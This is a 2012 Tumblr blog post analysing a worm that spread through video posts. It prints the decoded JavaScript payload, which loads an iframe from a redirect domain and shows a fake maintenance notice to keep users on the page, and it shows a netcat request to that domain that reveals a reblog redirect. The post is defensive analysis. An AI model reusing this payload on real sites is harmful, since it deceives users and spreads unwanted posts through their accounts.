Glad to see the GNAA is still just as irrelevant as ever.

Okay, let’s look into this virus because we all know I love nothing more than picking these things apart.

The payload is really just a base64-encoded script embedded into a video post. I’m not sure how exactly this works and I’m not about to open it in a reblog window to find out for obvious reasons, but it wouldn’t surprise me if Tumblr just didn’t even bother to check the validity of a video <embed> code.

Here’s the script, decoded from base64:

var framekiller = true;
window.onload = function(){
  document.getElementById('lapper').src = "http://i.hope.you.get.strangled.net";

}
window.onbeforeunload = function() {
  if(framekiller) {
    return "Notice: Tumblr will be undergoing maintenance on December 4th 2012 at 01:00 AM for several hours.\n\n We cannot forecast for exactly how long, unfortunately.\n We apologize for the inconvenience.\n\nYou may now dismiss this message via 'Cancel/Stay on this page'. Thank you.";  // any message that helps user to make decision
  }
};

#lapper is just an empty iframe that appears underneath the video. So what’s this “i.hope.you.get.strangled” site?

$ nc i.hope.you.get.strangled.net 80
GET / HTTP/1.1
Host: i.hope.you.get.strangled.net
HTTP/1.1 301 Moved Permanently
Date: Mon, 03 Dec 2012 16:50:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.8 with Suhosin-Patch
X-Powered-By: PHP/5.3.8
Cache-Control: public, max-age=15
X-Abuse: URL redirection provided by freedns.afraid.org - please report any misuse of this service
Location: hXXp://www.tumblr.com/reblog/37107421802/uJHrEsZm
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
0

(Note that I’ve altered the link above so no one accidentally clicks on it.)

In short, it’s a redirect to a reblog link. Note that this isn’t the same exploit as the trolling-maximum exploit from a couple months ago where fast_reblog pages didn’t do a CSRF check. So why does the reblog go through? Shouldn’t it wait for user input on the reblog page before being posted?

Unsurprisingly, Tumblr seems to have disabled reblogging for the moment while they fix the problem, so I can’t look any further into it than that for now. My guess is that the preview frame on the reblog page loads a different script that simulates a press of the “Create post” button, perhaps by checking the referring URL for “/reblog/”. But that’s just speculation.

So what have we learned today? Not much, really, considering we already knew that Tumblr and security are water and oil. We also already knew not to click on suspicious-looking posts… oh wait.

  1. warchamp7 reblogged this from fraxtil
  2. drugtripglasses reblogged this from fraxtil and added:
    well that was a riveting read. a script that simulates a click on the reblog post button sounds likely, or at least easy...
  3. lil-caliborn reblogged this from fraxtil
  4. cincoproducts reblogged this from fraxtil
  5. radruler reblogged this from fraxtil and added:
    Always love to see deconstruction work like this, would look into it myself too if I weren’t headed to class heh :x
  6. barrymanilowswinternightmare said: Fraxtil “SnarkDaddy” Gayfur B)
  7. fraxtil posted this